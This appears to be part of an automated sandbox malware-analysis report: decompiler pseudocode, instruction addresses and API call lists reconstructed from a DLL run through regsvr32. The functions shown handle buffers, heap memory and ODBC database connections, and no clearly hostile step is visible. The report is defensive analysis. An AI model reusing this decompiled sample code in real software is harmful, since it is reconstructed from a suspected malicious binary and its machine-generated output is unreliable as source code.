    										if(_t138 == 0) {
    											goto L49;
    										} else {
    											_t139 =  *0x10017120; // 0x20
    											_t156 =  *((intOrPtr*)(_t183 + 4));
    											_t174 = _t174 - (_t139 >> 3);
    											__eflags =  *(_t156 + 0x464);
    											if( *(_t156 + 0x464) <= 0) {
    												L25:
    												_t116 = _v184;
    											} else {
    												_t142 = E1000C4F0(_t183,  &_v160);
    												_t193 =  &(_t193[2]);
    												__eflags = _t142;
    												if(_t142 == 0) {
    													goto L25;
    												} else {
    													__eflags = _v184;
    													_t116 = 0 | _v184 == 0x00000000;
    												}
    											}
    											_t164 = _v196;
    											goto L27;
    										}
    									}
    								} else {
    									_t144 = E1000DDC0(_t183, _t169, _v188);
    									_t193 =  &(_t193[3]);
    									__eflags = _t144;
    									if(_t144 == 0) {
    										goto L49;
    									} else {
    										 *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0xfc)) = 1;
    										_t146 =  *((intOrPtr*)(_t183 + 4));
    										__eflags =  *(_t146 + 0xe18);
    										if( *(_t146 + 0xe18) == 0) {
    											__eflags =  *(_t146 + 0x26c);
    											if( *(_t146 + 0x26c) != 0) {
    												_t166 =  *(_t146 + 0x1c);
    												__eflags = _t166;
    												if(_t166 != 0) {
    													 *_t166(_t183, _t146 + 0x1b0,  *((intOrPtr*)(_t146 + 0x34)));
    													_t193 =  &(_t193[3]);
    												}
    											}
    										}
    										goto L89;
    									}
    								}
    							} else {
    								_push(_v188);
    								_push(_t169);
    								_push(_t183);
    								_t149 = E1000DF40(__eflags);
    								_t193 =  &(_t193[3]);
    								__eflags = _t149;
    								if(_t149 == 0) {
    									L49:
    									__eflags = 0;
    									return 0;
    								} else {
    									_t172 = 0x10016ea8;
    									_t182 = 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0xf8)) = 1;
    									_t163 =  *((intOrPtr*)(_t183 + 4));
    									_t167 = _t163 + 0x138;
    									while(1) {
    										__eflags =  *_t167 -  *_t172;
    										if( *_t167 !=  *_t172) {
    											break;
    										}
    										_t167 = _t167 + 4;
    										_t172 = _t172 + 4;
    										_t182 = _t182 - 4;
    										__eflags = _t182;
    										if(_t182 >= 0) {
    											continue;
    										} else {
    											 *((intOrPtr*)(_t163 + 0xe10)) = 0;
    										}
    										break;
    									}
    									_t152 =  *((intOrPtr*)(_t183 + 4));
    									__eflags =  *(_t152 + 0xe18);
    									if( *(_t152 + 0xe18) == 0) {
    										__eflags =  *(_t152 + 0x260);
    										if( *(_t152 + 0x260) != 0) {
    											_t168 =  *(_t152 + 0x1c);
    											__eflags = _t168;
    											if(_t168 != 0) {
    												 *_t168(_t183, _t152 + 0x100,  *((intOrPtr*)(_t152 + 0x34)));
    												_t193 =  &(_t193[3]);
    											}
    										}
    									}
    									L89:
    									__eflags = _v192;
    									if(_v192 != 0) {
    										_t122 = E1000B7C0(_t183,  *((intOrPtr*)(_t183 + 4)) + 0x17e0);
    										__eflags = _t122;
    										if(_t122 == 0) {
    											_t124 =  *((intOrPtr*)(_t183 + 4));
    											 *((intOrPtr*)(_t124 + 0x17e0)) = 0;
    											 *((intOrPtr*)(_t124 + 0x17e4)) = 0;
    										}
    										 *((intOrPtr*)( *_t183)) = 2;
    									}
    									return 1;
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return 0;
    				}
    				L94:
    			}















































    0x1000d441
    0x1000d44f
    0x1000d454
    0x1000d459
    0x1000d46d
    0x1000d474
    0x1000d483
    0x1000d488
    0x1000d48b
    0x1000d48d
    0x00000000
    0x1000d48f
    0x1000d4a0
    0x1000d4a5
    0x1000d4a8
    0x1000d4aa
    0x00000000
    0x1000d4ac
    0x1000d4ac
    0x1000d4b0
    0x1000d4b7
    0x1000d4b9
    0x1000d54c
    0x1000d54f
    0x1000d5b0
    0x1000d5b5
    0x1000d5b9
    0x1000d5c0
    0x1000d5c4
    0x1000d5c7
    0x1000d5cb
    0x1000d5cf
    0x1000d5d3
    0x1000d5d6
    0x1000d634
    0x1000d634
    0x1000d636
    0x1000d657
    0x1000d65a
    0x1000d6f0
    0x1000d6f2
    0x1000d739
    0x00000000
    0x1000d6f4
    0x1000d6f5
    0x1000d6fb
    0x00000000
    0x1000d6fb
    0x1000d660
    0x1000d660
    0x00000000
    0x1000d741
    0x1000d741
    0x00000000
    0x00000000
    0x1000d66b
    0x1000d670
    0x1000d673
    0x1000d675
    0x00000000
    0x1000d677
    0x1000d681
    0x1000d681
    0x00000000
    0x00000000
    0x1000d682
    0x1000d684
    0x1000d693
    0x1000d695
    0x1000d745
    0x1000d745
    0x1000d748
    0x1000d74f
    0x1000d751
    0x1000d754
    0x1000d756
    0x1000d758
    0x1000d75f
    0x1000d760
    0x1000d761
    0x1000d763
    0x1000d767
    0x1000d76a
    0x1000d76a
    0x1000d756
    0x1000d76e
    0x1000d771
    0x1000d852
    0x1000d852
    0x00000000
    0x1000d777
    0x1000d777
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000d856
    0x1000d856
    0x1000d858
    0x1000d85b
    0x00000000
    0x1000d85b
    0x00000000
    0x00000000
    0x1000d784
    0x1000d786
    0x1000d789
    0x1000d78b
    0x1000d78b
    0x1000d78e
    0x1000d792
    0x1000d794
    0x1000d7bd
    0x1000d7bd
    0x1000d796
    0x1000d796
    0x1000d798
    0x1000d79a
    0x00000000
    0x1000d79c
    0x1000d79c
    0x1000d7a0
    0x1000d7a0
    0x1000d7a4
    0x1000d7a6
    0x1000d7a9
    0x1000d7ab
    0x1000d7af
    0x1000d7b2
    0x1000d7b2
    0x1000d7b6
    0x1000d7b7
    0x1000d7b7
    0x1000d7bb
    0x1000d79a
    0x1000d7c1
    0x1000d7c3
    0x1000d7ca
    0x00000000
    0x1000d7ca
    0x00000000
    0x00000000
    0x1000d7d1
    0x1000d7de
    0x1000d7e0
    0x1000d817
    0x1000d817
    0x1000d7e2
    0x1000d7e2
    0x1000d7e4
    0x1000d7e6
    0x00000000
    0x1000d7e8
    0x1000d7e8
    0x1000d7ef
    0x1000d7ef
    0x1000d7f1
    0x1000d7f1
    0x1000d7f5
    0x1000d7f7
    0x1000d7fa
    0x1000d7fc
    0x1000d803
    0x1000d806
    0x1000d806
    0x1000d80d
    0x1000d80e
    0x1000d811
    0x1000d811
    0x1000d815
    0x1000d7e6
    0x1000d81e
    0x1000d820
    0x1000d823
    0x00000000
    0x1000d823
    0x00000000
    0x00000000
    0x1000d827
    0x1000d82d
    0x1000d82f
    0x1000d832
    0x1000d834
    0x1000d837
    0x1000d83b
    0x1000d83d
    0x1000d840
    0x1000d842
    0x1000d845
    0x1000d849
    0x1000d84b
    0x1000d84e
    0x1000d861
    0x1000d861
    0x1000d861
    0x00000000
    0x00000000
    0x1000d777
    0x00000000
    0x1000d686
    0x1000d68d
    0x1000d6ff
    0x1000d6ff
    0x1000d702
    0x1000d704
    0x1000d720
    0x1000d725
    0x1000d728
    0x1000d72a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000d706
    0x1000d708
    0x00000000
    0x1000d708
    0x1000d704
    0x00000000
    0x00000000
    0x1000d69e
    0x1000d6a4
    0x1000d6ac
    0x1000d6ae
    0x00000000
    0x1000d6b0
    0x1000d6b0
    0x1000d6b2
    0x1000d6ba
    0x1000d6ba
    0x00000000
    0x00000000
    0x1000d6bb
    0x1000d6bf
    0x1000d6c0
    0x1000d6c1
    0x1000d6c6
    0x1000d6c9
    0x1000d6cb
    0x00000000
    0x1000d6cd
    0x1000d6cd
    0x1000d6cf
    0x1000d6d7
    0x1000d6d7
    0x00000000
    0x00000000
    0x1000d6d8
    0x1000d6de
    0x1000d6e6
    0x1000d6e8
    0x1000d70e
    0x1000d711
    0x1000d71a
    0x1000d6ea
    0x1000d6ea
    0x1000d6ea
    0x00000000
    0x1000d6ea
    0x00000000
    0x00000000
    0x1000d660
    0x1000d638
    0x1000d63c
    0x1000d641
    0x1000d644
    0x1000d646
    0x00000000
    0x1000d64c
    0x1000d656
    0x1000d656
    0x1000d646
    0x1000d5d8
    0x1000d5d8
    0x1000d5e9
    0x1000d5ee
    0x1000d5f1
    0x1000d5f3
    0x00000000
    0x1000d5f9
    0x1000d5f9
    0x1000d5fe
    0x1000d604
    0x1000d606
    0x1000d60d
    0x1000d62c
    0x1000d62c
    0x1000d60f
    0x1000d615
    0x1000d61a
    0x1000d61d
    0x1000d61f
    0x00000000
    0x1000d621
    0x1000d623
    0x1000d627
    0x1000d627
    0x1000d61f
    0x1000d630
    0x00000000
    0x1000d630
    0x1000d5f3
    0x1000d551
    0x1000d557
    0x1000d55c
    0x1000d55f
    0x1000d561
    0x00000000
    0x1000d567
    0x1000d56a
    0x1000d574
    0x1000d577
    0x1000d57e
    0x1000d584
    0x1000d58b
    0x1000d591
    0x1000d594
    0x1000d596
    0x1000d5a6
    0x1000d5a8
    0x1000d5a8
    0x1000d596
    0x1000d58b
    0x00000000
    0x1000d57e
    0x1000d561
    0x1000d4bf
    0x1000d4bf
    0x1000d4c3
    0x1000d4c4
    0x1000d4c5
    0x1000d4ca
    0x1000d4cd
    0x1000d4cf
    0x1000d72c
    0x1000d72f
    0x1000d738
    0x1000d4d5
    0x1000d4d8
    0x1000d4dd
    0x1000d4e2
    0x1000d4ec
    0x1000d4ef
    0x1000d4f5
    0x1000d4f7
    0x1000d4f9
    0x00000000
    0x00000000
    0x1000d4fb
    0x1000d4fe
    0x1000d501
    0x1000d501
    0x1000d504
    0x00000000
    0x1000d506
    0x1000d506
    0x1000d506
    0x00000000
    0x1000d504
    0x1000d510
    0x1000d513
    0x1000d51a
    0x1000d520
    0x1000d527
    0x1000d52d
    0x1000d530
    0x1000d532
    0x1000d542
    0x1000d544
    0x1000d544
    0x1000d532
    0x1000d527
    0x1000d864
    0x1000d864
    0x1000d869
    0x1000d875
    0x1000d87d
    0x1000d87f
    0x1000d881
    0x1000d884
    0x1000d88e
    0x1000d88e
    0x1000d89a
    0x1000d89a
    0x1000d8af
    0x1000d8af
    0x1000d4cf
    0x1000d4b9
    0x1000d4aa
    0x1000d45b
    0x1000d45b
    0x1000d464
    0x1000d464
    0x00000000

    APIs
    • free.MSVCRT(00000000), ref: 1000D85B
      • Part of subcall function 1000DDC0: realloc.MSVCRT ref: 1000DE19
    • malloc.MSVCRT ref: 1000D687
      • Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E15B
      • Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E1C8
      • Part of subcall function 1000E130: malloc.MSVCRT ref: 1000E21C
      • Part of subcall function 1000D8F0: memset.MSVCRT ref: 1000D901
      • Part of subcall function 1000D8F0: calloc.MSVCRT ref: 1000D9CF
      • Part of subcall function 1000D8F0: calloc.MSVCRT ref: 1000DB24
      • Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DC55
      • Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DCB5
      • Part of subcall function 1000DC00: malloc.MSVCRT ref: 1000DD7F
    • malloc.MSVCRT ref: 1000D6F5
    • free.MSVCRT(00000000,00000000), ref: 1000D789
    • free.MSVCRT(?,00000000), ref: 1000D7A9
    • free.MSVCRT(?,00000000), ref: 1000D7CA
    • free.MSVCRT(?), ref: 1000D7FA
    • free.MSVCRT(?), ref: 1000D823
    • free.MSVCRT(?), ref: 1000D832
    • free.MSVCRT(?), ref: 1000D840
    • free.MSVCRT(?), ref: 1000D84E
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    APIs
    • __p__iob.MSVCRT(00000000,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C5C6
    • __p__iob.MSVCRT(00008000,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C5D5
    • _fileno.MSVCRT ref: 1000C5D8
    • _setmode.MSVCRT ref: 1000C5E2
    • __p__iob.MSVCRT ref: 1000C5EB
    • __p__iob.MSVCRT(1000C0C0,?,?,?,?,?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39), ref: 1000C60E
    • __p__iob.MSVCRT(?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C623
    • __p__iob.MSVCRT(?,?,1000B89F,?,?,?,?,?,?,00000000,10007C39,00000000,?,10007F40,00000000,10007DC0), ref: 1000C638
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E100123D0(void* __eflags) {
    				signed int* _t153;
    				intOrPtr _t154;
    				void* _t159;
    				signed int _t160;
    				void* _t164;
    				signed int _t171;
    				void* _t172;
    				void* _t173;
    				int _t181;
    				void* _t182;
    				signed int _t183;
    				signed int _t187;
    				signed int _t189;
    				void* _t194;
    				signed int _t196;
    				int _t207;
    				signed int _t208;
    				void* _t224;
    				signed int _t225;
    				void* _t227;
    				void* _t232;
    				signed int _t233;
    				intOrPtr _t235;
    				void* _t236;
    				signed int _t240;
    				signed int _t241;
    				signed int _t249;
    				void* _t250;
    				signed int _t251;
    				intOrPtr _t252;
    				signed int _t253;
    				signed char* _t254;
    				void* _t257;
    				void** _t260;
    				signed int _t261;
    				signed int _t262;
    				void* _t263;
    				void* _t264;
    				void* _t265;
    				void* _t266;
    
    				_t153 =  *(_t265 + 0x34);
    				_t261 =  *_t153;
    				_t207 = _t153[3];
    				 *(_t265 + 0xc) = _t153[2];
    				_t240 =  *(_t261 + 5) & 0x000000ff;
    				 *(_t265 + 0x24) =  *(_t261 + 4) & 0x000000ff;
    				 *(_t265 + 0x18) = _t261;
    				 *(_t265 + 0x28) = _t240 & 0x00000001;
    				_t241 = _t240 & 0x00000004;
    				_t257 = 0;
    				 *(_t265 + 0x18) = _t240 & 0x00000002;
    				 *(_t265 + 0x3c) = _t241;
    				_t154 = E10011FF0(_t241, _t153);
    				_t266 = _t265 + 4;
    				_t260 =  *(_t266 + 0x40);
    				 *(_t266 + 0x34) = _t241;
    				 *((intOrPtr*)(_t266 + 0x30)) = _t154;
    				 *(_t266 + 0x24) = ((( *(_t261 + 0x11) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x10) & 0x000000ff) << 0x00000008 |  *(_t261 + 0xf) & 0x000000ff) << 0x00000008 |  *(_t261 + 0xe) & 0x000000ff;
    				_t249 = _t260[9];
    				 *(_t266 + 0x44) = _t249;
    				_t262 =  *(_t261 + 0x1a) & 0x000000ff;
    				 *(_t266 + 0x18) = _t262;
    				_t159 = _t260[3];
    				 *(_t266 + 0x20) = ((( *(_t261 + 0x15) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x14) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x13) & 0x000000ff) << 0x00000008 |  *(_t261 + 0x12) & 0x000000ff;
    				if(_t159 != 0) {
    					_t30 =  &(_t260[2]);
    					 *_t30 = _t260[2] - _t159;
    					if( *_t30 != 0) {
    						memmove( *_t260, _t159 +  *_t260, _t260[2]);
    						_t249 =  *(_t266 + 0x50);
    						_t266 = _t266 + 0xc;
    					}
    					_t260[3] = _t257;
    				}
    				if(_t249 != 0) {
    					_t196 = _t260[7] - _t249;
    					if(_t196 != 0) {
    						memmove(_t260[4], _t260[4] + _t249 * 4, _t196 << 2);
    						memmove(_t260[5], _t260[5] +  *(_t266 + 0x50) * 8, _t260[7] -  *(_t266 + 0x50) << 3);
    						_t249 =  *(_t266 + 0x5c);
    						_t266 = _t266 + 0x18;
    					}
    					_t260[7] = _t260[7] - _t249;
    					_t260[8] = _t260[8] - _t249;
    					_t260[9] = _t257;
    				}
    				_t160 =  *(_t266 + 0x24);
    				if(_t160 == _t260[0x54]) {
    					if( *((intOrPtr*)(_t266 + 0x28)) > _t257) {
    						goto L9;
    					} else {
    						_t224 = 1 + _t262;
    						_t250 = _t260[6];
    						if(_t250 <= _t260[7] + _t224) {
    							_t189 = _t250 + 0x20 + _t224;
    							_t260[6] = _t189;
    							_t260[4] = realloc(_t260[4], _t189 << 2);
    							_t194 = realloc(_t260[5], _t260[6] << 3);
    							_t266 = _t266 + 0x10;
    							_t260[5] = _t194;
    						}
    						_t164 = _t260[0x55];
    						if( *(_t266 + 0x20) != _t164) {
    							_t253 = _t260[8];
    							_t263 = _t260[7];
    							 *(_t266 + 0x44) = _t253;
    							if(_t253 < _t263) {
    								_t236 = _t260[2];
    								_t264 = _t263 -  *(_t266 + 0x44);
    								_t254 = _t260[4] + _t253 * 4;
    								do {
    									_t187 =  *_t254 & 0x000000ff;
    									_t254 =  &(_t254[4]);
    									_t236 = _t236 - _t187;
    									_t260[2] = _t236;
    									_t264 = _t264 - 1;
    								} while (_t264 != 0);
    								_t253 =  *(_t266 + 0x44);
    								_t164 = _t260[0x55];
    							}
    							_t262 =  *(_t266 + 0x18);
    							_t260[7] = _t253;
    							if(_t164 != 0xffffffff) {
    								 *(_t260[4] + _t253 * 4) = 0x400;
    								_t260[7] = _t260[7] + 1;
    								_t260[8] = _t260[8] + 1;
    							}
    						}
    						if( *((intOrPtr*)(_t266 + 0x2c)) != _t257) {
    							_t233 = _t260[7];
    							if(_t233 < 1 ||  *((intOrPtr*)(_t260[4] + _t233 * 4 - 4)) == 0x400) {
    								 *(_t266 + 0x14) = 0;
    								if(_t262 > 0) {
    									_t235 =  *((intOrPtr*)(_t266 + 0x10));
    									_t252 =  *((intOrPtr*)(_t266 + 0x1c));
    									do {
    										_t183 =  *(_t252 + _t257 + 0x1b) & 0x000000ff;
    										_t257 = _t257 + 1;
    										_t235 = _t235 + _t183;
    										_t207 = _t207 - _t183;
    										 *((intOrPtr*)(_t266 + 0x10)) = _t235;
    									} while (_t183 >= 0xff && _t257 < _t262);
    								}
    							}
    						}
    						if(_t207 != 0) {
    							_t232 = _t260[1];
    							if(_t232 <= _t260[2] + _t207) {
    								_t181 = _t232 + 0x400 + _t207;
    								_t260[1] = _t181;
    								_t182 = realloc( *_t260, _t181);
    								_t266 = _t266 + 8;
    								 *_t260 = _t182;
    							}
    							memcpy( *_t260 + _t260[2],  *(_t266 + 0x14), _t207);
    							_t266 = _t266 + 0xc;
    							_t260[2] = _t260[2] + _t207;
    						}
    						_t208 = _t207 | 0xffffffff;
    						if(_t257 < _t262) {
    							do {
    								_t251 =  *( *((intOrPtr*)(_t266 + 0x1c)) + _t257 + 0x1b) & 0x000000ff;
    								 *(_t260[4] + _t260[7] * 4) = _t251;
    								_t227 = _t260[5];
    								_t171 = _t260[7];
    								 *((intOrPtr*)(_t227 + _t171 * 8)) = 0xffffffff;
    								 *((intOrPtr*)(_t227 + 4 + _t171 * 8)) = 0xffffffff;
    								if( *(_t266 + 0x14) != 0) {
    									 *(_t260[4] + _t260[7] * 4) =  *(_t260[4] + _t260[7] * 4) | 0x00000100;
    									 *(_t266 + 0x14) = 0;
    								}
    								if(_t251 < 0xff) {
    									_t208 = _t260[7];
    								}
    								_t260[7] = _t260[7] + 1;
    								_t257 = _t257 + 1;
    								_t172 = _t260[7];
    								if(_t251 < 0xff) {
    									_t260[8] = _t172;
    								}
    							} while (_t257 < _t262);
    							if(_t208 != 0xffffffff) {
    								_t173 = _t260[5];
    								 *((intOrPtr*)(_t173 + _t208 * 8)) =  *((intOrPtr*)(_t266 + 0x30));
    								 *(_t173 + 4 + _t208 * 8) =  *(_t266 + 0x34);
    							}
    						}
    						if( *((intOrPtr*)(_t266 + 0x38)) != 0) {
    							_t225 = _t260[7];
    							_t260[0x52] = 1;
    							if(_t225 > 0) {
    								 *((intOrPtr*)(_t260[4] + _t225 * 4 - 4)) =  *(_t260[4] + _t225 * 4 - 4) | 0x00000200;
    							}
    						}
    						_t260[0x55] = 1 +  *(_t266 + 0x20);
    						return 0;
    					}
    				} else {
    					L9:
    					return _t160 | 0xffffffff;
    				}
    			}











































    0x100123d3
    0x100123da
    0x100123df
    0x100123e2
    0x100123ea
    0x100123ee
    0x100123f7
    0x100123fb
    0x10012405
    0x10012409
    0x1001240b
    0x1001240f
    0x10012413
    0x1001241c
    0x1001241f
    0x10012423
    0x10012430
    0x10012453
    0x1001245b
    0x10012463
    0x1001246b
    0x10012474
    0x10012478
    0x1001247b
    0x10012481
    0x10012483
    0x10012483
    0x10012486
    0x10012491
    0x10012496
    0x1001249a
    0x1001249a
    0x1001249d
    0x1001249d
    0x100124a2
    0x100124a7
    0x100124a9
    0x100124b7
    0x100124d1
    0x100124d6
    0x100124da
    0x100124da
    0x100124dd
    0x100124e0
    0x100124e3
    0x100124e3
    0x100124e6
    0x100124f0
    0x10012501
    0x00000000
    0x10012503
    0x10012506
    0x10012509
    0x10012510
    0x10012515
    0x10012517
    0x10012526
    0x10012533
    0x10012538
    0x1001253b
    0x1001253b
    0x1001253e
    0x10012548
    0x1001254a
    0x1001254d
    0x10012550
    0x10012556
    0x1001255b
    0x1001255e
    0x10012562
    0x10012565
    0x10012565
    0x10012568
    0x1001256b
    0x1001256d
    0x10012570
    0x10012570
    0x10012573
    0x10012577
    0x10012577
    0x1001257d
    0x10012581
    0x10012587
    0x1001258c
    0x10012593
    0x10012596
    0x10012596
    0x10012587
    0x1001259d
    0x1001259f
    0x100125a5
    0x100125b6
    0x100125bc
    0x100125be
    0x100125c2
    0x100125c6
    0x100125c6
    0x100125cb
    0x100125cc
    0x100125ce
    0x100125d0
    0x100125d4
    0x100125c6
    0x100125bc
    0x100125a5
    0x100125e1
    0x100125e6
    0x100125ed
    0x100125f5
    0x100125fa
    0x100125fd
    0x10012602
    0x10012605
    0x10012605
    0x10012612
    0x10012617
    0x1001261a
    0x1001261a
    0x1001261d
    0x10012622
    0x10012624
    0x10012630
    0x10012638
    0x1001263b
    0x1001263e
    0x10012641
    0x10012648
    0x10012650
    0x10012658
    0x10012661
    0x10012661
    0x1001266b
    0x1001266d
    0x1001266d
    0x10012670
    0x10012673
    0x10012674
    0x1001267d
    0x1001267f
    0x1001267f
    0x10012682
    0x10012689
    0x1001268b
    0x10012692
    0x10012699
    0x10012699
    0x10012689
    0x100126a2
    0x100126a4
    0x100126a7
    0x100126b3
    0x100126b8
    0x100126b8
    0x100126b3
    0x100126c6
    0x100126d4
    0x100126d4
    0x100124f2
    0x100124f2
    0x100124fc
    0x100124fc

    APIs
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 50%
    			E100089AD(void* __ecx, intOrPtr* _a4) {
    				void _v8;
    				char _v12;
    				char _v16;
    				char _v2064;
    				void* _t16;
    				struct HWND__* _t20;
    				struct HWND__* _t21;
    				char* _t22;
    				void* _t23;
    				void* _t27;
    				void* _t28;
    				intOrPtr* _t31;
    
    				_t27 = __ecx;
    				_t16 =  &_v8;
    				_t31 = 0;
    				_push(_t16);
    				_push( *0x1002c53c);
    				_v12 = 0;
    				_push(2);
    				L10007383();
    				if(_t16 == 0) {
    					_push(1);
    					_push( &_v12);
    					_push(0x400);
    					_push( &_v2064);
    					_push(0);
    					_push(0);
    					_t20 = GetForegroundWindow();
    					_push(_t20);
    					_push(_v8);
    					L100073B9();
    					_t21 = _t20;
    					if(_t21 == 0 || _t21 == 1) {
    						_t22 =  &_v16;
    						_push(_t22);
    						_push(_v8);
    						_push(3);
    						L10007383();
    						if(_t22 != 0) {
    							goto L4;
    						} else {
    							_t23 = HeapAlloc( *0x10028080, 8, 0x20);
    							_t31 = _a4;
    							_t28 = _t23;
    							 *((intOrPtr*)(_t28 + 8)) = _v16;
    							 *_t28 = _v8;
    							 *_t31 = 0x1002c540;
    							 *(_t31 + 4) = _t28;
    						}
    					} else {
    						E10008B11(_t27, _v8, 2);
    						L4:
    						_push(_v8);
    						L100073B3();
    						_push(_v8);
    						_push(2);
    						L1000739B();
    					}
    				}
    				return _t31;
    			}















    0x100089ad
    0x100089b7
    0x100089ba
    0x100089bc
    0x100089bd
    0x100089c3
    0x100089c6
    0x100089c8
    0x100089d0
    0x100089d2
    0x100089d7
    0x100089d8
    0x100089e3
    0x100089e4
    0x100089e5
    0x100089e6
    0x100089ec
    0x100089ed
    0x100089f0
    0x100089f5
    0x100089f8
    0x10008a26
    0x10008a29
    0x10008a2a
    0x10008a2d
    0x10008a2f
    0x10008a37
    0x00000000
    0x10008a39
    0x10008a43
    0x10008a49
    0x10008a4c
    0x10008a51
    0x10008a57
    0x10008a59
    0x10008a5f
    0x10008a5f
    0x100089ff
    0x10008a04
    0x10008a0b
    0x10008a0b
    0x10008a0e
    0x10008a13
    0x10008a16
    0x10008a18
    0x10008a18
    0x100089f8
    0x10008a23

    APIs
    • SQLAllocHandle.ODBC32(00000002,?), ref: 100089C8
    • GetForegroundWindow.USER32 ref: 100089E6
    • SQLDriverConnectW.ODBC32(?,00000000), ref: 100089F0
    • SQLDisconnect.ODBC32(?,00000003,?,?,?,00000000), ref: 10008A0E
    • SQLFreeHandle.ODBC32(00000002,?,?,00000003,?,?,?,00000000), ref: 10008A18
    • SQLAllocHandle.ODBC32(00000003,?,?,?,00000000), ref: 10008A2F
    • HeapAlloc.KERNEL32(00000008,00000020,00000003,?,?,?,00000000), ref: 10008A43
      • Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 48%
    			E1000875C(char _a4) {
    				short _v4;
    				long _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				short _v40;
    				char _v48;
    				signed int _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char* _t38;
    				signed int _t39;
    				short _t42;
    				char* _t47;
    				signed int _t66;
    				char _t68;
    				void* _t70;
    
    				_t68 = _a4;
    				_v8 = 0;
    				if( *((intOrPtr*)(_t68 + 0xc)) == 0 &&  *((intOrPtr*)(_t68 + 4)) != 0) {
    					_t38 =  &_a4;
    					_push(_t38);
    					_push( *((intOrPtr*)(_t68 + 4)));
    					L100073A1();
    					if(_t38 == 0) {
    						_t39 = _v4;
    						 *(_t68 + 0x10) = _t39;
    						 *((intOrPtr*)(_t68 + 0xc)) = HeapAlloc( *0x10028080, 0, _t39 << 2);
    						_t66 = 0;
    						_t42 = 0;
    						if(0 >= _v4) {
    							L8:
    							return _t42;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_push( &_v28);
    							_push( &_v24);
    							_push( &_v12);
    							_push( &_v20);
    							_t47 =  &_v16;
    							_push(_t47);
    							_push(0);
    							_push(0);
    							_t16 = _t66 + 1; // 0x1
    							_t70 = _t16;
    							_push(_t70);
    							_push( *((intOrPtr*)(_t68 + 4)));
    							L1000737D();
    							if(_t47 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)) = HeapAlloc( *0x10028080, 0, 2);
    							} else {
    								 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)) = HeapAlloc( *0x10028080, 0, 2 + _v52 * 2);
    								_push( &_v64);
    								_push( &_v60);
    								_push( &_v48);
    								_push( &_v56);
    								_push( &_v52);
    								_push(_v52 + 1);
    								_push( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xc)) + _t66 * 4)));
    								_push(_t70);
    								_push( *((intOrPtr*)(_t68 + 4)));
    								L1000737D();
    							}
